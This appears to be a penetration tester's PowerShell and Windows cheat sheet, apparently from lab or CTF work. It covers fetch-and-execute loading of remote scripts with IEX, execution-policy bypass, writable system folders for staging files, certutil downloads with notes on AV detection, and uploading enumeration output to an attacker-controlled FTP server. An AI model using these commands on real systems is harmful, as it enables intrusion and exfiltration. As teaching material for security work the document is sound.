CLI Tips

Powershell

Load Powershell Module Over HTTP

Fetch a script over HTTP and execute it in the current session without writing it to disk:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1')

Invoke-Expression runs whatever the server returns, so only point this at a host you control; anything in the path (a proxy, a MITM on plain HTTP) can substitute its own code.
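The same in-memory load, but with the script's SHA-256 pinned before it is executed, so a tampered or wrong file is refused. This is an added example, not code from the original page; the URL and the expected hash are placeholders you replace with your own (compute the hash of the script on your server with sha256sum).

```powershell
# Added example: download a script into memory, verify its SHA-256, then execute it.
# $Url and $ExpectedSha256 are placeholders; nothing here is from the original page.
$Url            = 'http://example.com/some_module.ps1'
$ExpectedSha256 = '0000000000000000000000000000000000000000000000000000000000000000'

# Older Windows PowerShell builds default to SSL3/TLS1.0; enable TLS 1.2 for https hosts
[Net.ServicePointManager]::SecurityProtocol =
    [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12

# Fetch raw bytes so the hash is computed over exactly what the server sent
$bytes  = (New-Object Net.WebClient).DownloadData($Url)
$sha256 = [System.Security.Cryptography.SHA256]::Create()
$actual = ($sha256.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''

if ($actual -ne $ExpectedSha256.ToLower()) {
    throw "Refusing to execute $Url : SHA-256 $actual does not match pinned value"
}

# Decode as UTF-8, strip a BOM if the file has one, and run it in this session;
# the script never touches disk.
$script = [System.Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
Invoke-Expression $script
```

Pinning the hash does not make plain HTTP confidential, but it does turn a silent substitution into a hard failure.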

Bypass Powershell Execution Policy

If the execution policy is Restricted or AllSigned (the default on client Windows is Restricted), PowerShell refuses to run .ps1 files from disk. Start PowerShell with the policy set to Bypass for that process:

powershell.exe -ExecutionPolicy Bypass

The execution policy is a safety feature against accidentally running scripts, not a security boundary: it does not need admin rights to override and it does not apply to commands typed or piped into the session.

Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine but running a 32-bit PowerShell (for example because a 32-bit parent process launched it), some things might not work, such as autologon discovery, because the 32-bit process sees redirected views of System32 and of parts of the registry.

  • Check in PowerShell:

    • [environment]::Is64BitOperatingSystem

    • [environment]::Is64BitProcess

  • Access 64-bit PowerShell at:

    • C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe

    • SysNative is a virtual alias that the WOW64 file-system redirector exposes only to 32-bit processes on 64-bit Windows. It does not appear in a directory listing from a 64-bit process (from there, System32 already is the 64-bit directory), but a 32-bit process can open it.

    • Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this full path instead of just powershell.exe with no path, which the 32-bit parent resolves to the 32-bit SysWOW64 copy.
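The check-and-relaunch pattern above as a self-contained script, added here as an example (it is not from the original page). It assumes it is saved as a .ps1 file so that $PSCommandPath is set, and it carries the execution-policy bypass through to the relaunched process.

```powershell
# Added example: if we are a 32-bit process on a 64-bit OS, re-run this script
# under the 64-bit host via the SysNative alias, then exit with its exit code.
# Assumes the code is saved as a .ps1 file (so $PSCommandPath is populated).
if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
    $sysnative = Join-Path $env:windir 'SysNative\WindowsPowerShell\v1.0\powershell.exe'

    # The alias is only visible to 32-bit processes; if it is missing something is off.
    if (-not (Test-Path -LiteralPath $sysnative)) {
        throw "SysNative alias not found at $sysnative; is this really a 32-bit process?"
    }

    Write-Host "32-bit PowerShell on 64-bit Windows, relaunching via $sysnative"
    # -ExecutionPolicy Bypass so the relaunched copy is not blocked by policy;
    # @args forwards whatever parameters this script was invoked with.
    & $sysnative -NoProfile -ExecutionPolicy Bypass -File $PSCommandPath @args
    exit $LASTEXITCODE
}

# Everything below runs in a 64-bit process (or on a 32-bit OS, where there is
# no redirection to worry about).
"PID $PID  Is64BitProcess=$([Environment]::Is64BitProcess)  PSHOME=$PSHOME"
```

After the relaunch, $PSHOME should point at C:\Windows\System32\WindowsPowerShell\v1.0, not the SysWOW64 copy.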

View Hidden Files

Get-ChildItem -Force

Running Powershell commands from CMD

You can run a single PowerShell command from a cmd prompt like this, but in some shells you need to press Enter once more before the output appears.

powershell -command "whoami"

Writable Folders

Folders that are writable by ordinary authenticated users on a default Windows install (useful for staging files when your current user's profile is off-limits):

  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

  • C:\Windows\System32\spool\drivers\color

  • C:\Windows\Tasks

  • C:\Windows\tracing

  • C:\Windows\Temp

  • C:\Users\Public

Writable does not mean you can execute from there: AppLocker or WDAC rules, and hardened ACLs on a locked-down image, can change the picture, so verify on the box rather than assuming.
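A probe that tests each of the folders above by actually creating a file in it, which is more reliable than reading ACLs by eye, and then prints the ACEs that grant the write. This is an added example rather than code from the original page; the folder list is the one above, expressed through %windir% and %SystemDrive% so it also works on non-standard installs.

```powershell
# Added example: test which candidate folders the current user can really write to.
# The list mirrors the page's defaults; paths are built from environment variables.
$candidates = @(
    "$env:windir\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:windir\System32\spool\drivers\color",
    "$env:windir\Tasks",
    "$env:windir\tracing",
    "$env:windir\Temp",
    "$env:SystemDrive\Users\Public"
)

function Test-FolderWritable {
    param([Parameter(Mandatory)][string]$Path)
    # $null = folder does not exist, $true = file creation succeeded, $false = denied
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $null }
    $probe = Join-Path $Path ("probe_{0}.tmp" -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($probe, 'x')      # throws UnauthorizedAccessException on deny
    } catch {
        return $false
    }
    # Some folders (MachineKeys) let you create but may restrict later operations;
    # a failed cleanup must not be reported as "not writable".
    Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
    return $true
}

foreach ($dir in $candidates) {
    $result = Test-FolderWritable -Path $dir
    $state  = if ($null -eq $result) { 'missing' } elseif ($result) { 'WRITABLE' } else { 'denied' }
    "{0,-62} {1}" -f $dir, $state
    if ($result) {
        # Show which principals hold write-capable rights on the folder
        (Get-Acl -LiteralPath $dir).Access |
            Where-Object { $_.FileSystemRights -match 'Write|Modify|FullControl' } |
            ForEach-Object { "    {0,-38} {1}" -f $_.IdentityReference, $_.FileSystemRights }
    }
}
```

Run it as the low-privileged user you actually have, not as an administrator, or every folder will come back WRITABLE.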

Transferring Files

HTTP Download

Start an HTTP server on your Linux machine:

python3 -m http.server

Download a file with Invoke-WebRequest (present on every supported Windows version):

Invoke-WebRequest -Uri http://IP:PORT/file.exe -OutFile file.exe

Download with curl, in case the real curl.exe is installed (Windows 10 1803 and later ship it). Inside PowerShell, plain curl is an alias for Invoke-WebRequest, so call curl.exe explicitly, and use lowercase -o to name the output file (uppercase -O means "use the remote file name" and would treat ./file.exe as a second URL):

curl.exe -o file.exe http://IP:PORT/file.exe

Download file using certutil:

certutil.exe -urlcache -split -f http://IP:PORT/path/filename.exe filename.exe

certutil downloads are widely signatured by AV/EDR, and certutil keeps a copy of the URL in the user's URL cache; you can remove that entry afterwards with certutil.exe -urlcache http://IP:PORT/path/filename.exe delete.
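The three download methods above wrapped in one function that tries them in order and refuses the file unless its SHA-256 matches the one you computed on your own server (sha256sum file.exe on the Linux side). This is an added example, not from the original page; the function name, the URL, the destination and the hash are all placeholders.

```powershell
# Added example: download with whichever tool the target offers, then verify SHA-256.
# Get-FileWithFallback is a name invented for this example; all parameters are yours.
function Get-FileWithFallback {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Dest,
        [Parameter(Mandatory)][string]$ExpectedSha256
    )
    # Ordered from least to most noisy on the endpoint
    $methods = @(
        { Invoke-WebRequest -Uri $Url -OutFile $Dest -UseBasicParsing },
        { & "$env:windir\System32\curl.exe" -s -o $Dest $Url },                     # real curl, not the alias
        { & "$env:windir\System32\certutil.exe" -urlcache -split -f $Url $Dest | Out-Null }
    )

    foreach ($m in $methods) {
        Remove-Item -LiteralPath $Dest -Force -ErrorAction SilentlyContinue
        try { & $m } catch { continue }                 # missing binary or HTTP error: try the next
        if (Test-Path -LiteralPath $Dest) { break }
    }
    if (-not (Test-Path -LiteralPath $Dest)) { throw "All download methods failed for $Url" }

    # -ne on strings is case-insensitive in PowerShell, so hash case does not matter
    $actual = (Get-FileHash -LiteralPath $Dest -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -LiteralPath $Dest -Force
        throw "SHA-256 mismatch for $Dest : expected $ExpectedSha256, got $actual"
    }
    Get-Item -LiteralPath $Dest
}

# Usage (placeholders):
# Get-FileWithFallback -Url 'http://IP:PORT/file.exe' -Dest "$env:TEMP\file.exe" `
#     -ExpectedSha256 'PASTE_SHA256_FROM_YOUR_SERVER'
```

If certutil ends up being the method that worked, remember the URL-cache entry it leaves behind.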

FTP Upload

Start an FTP server on your Linux machine (pyftpdlib listens on port 2121 by default and serves the current directory; --write allows uploads):

pip3 install pyftpdlib
python3 -m pyftpdlib --username myuser --password mypass --write

If you don't specify a username and password, you can log in as user anonymous with no password. FTP is cleartext, so the credentials and the uploaded file travel unencrypted, and the URI below puts the password into your PowerShell history.

Upload a file from the Windows side with .NET's WebClient:

# Local file to upload and the destination on the FTP server (user:pass in the URI)
$File = "C:\Users\svc-alfresco\Documents\winpeas.txt";
$ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt";
$webclient = New-Object -TypeName System.Net.WebClient;
$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;
# UploadFile issues an FTP STOR; it throws a WebException if login or write fails
$webclient.UploadFile($uri, $File);
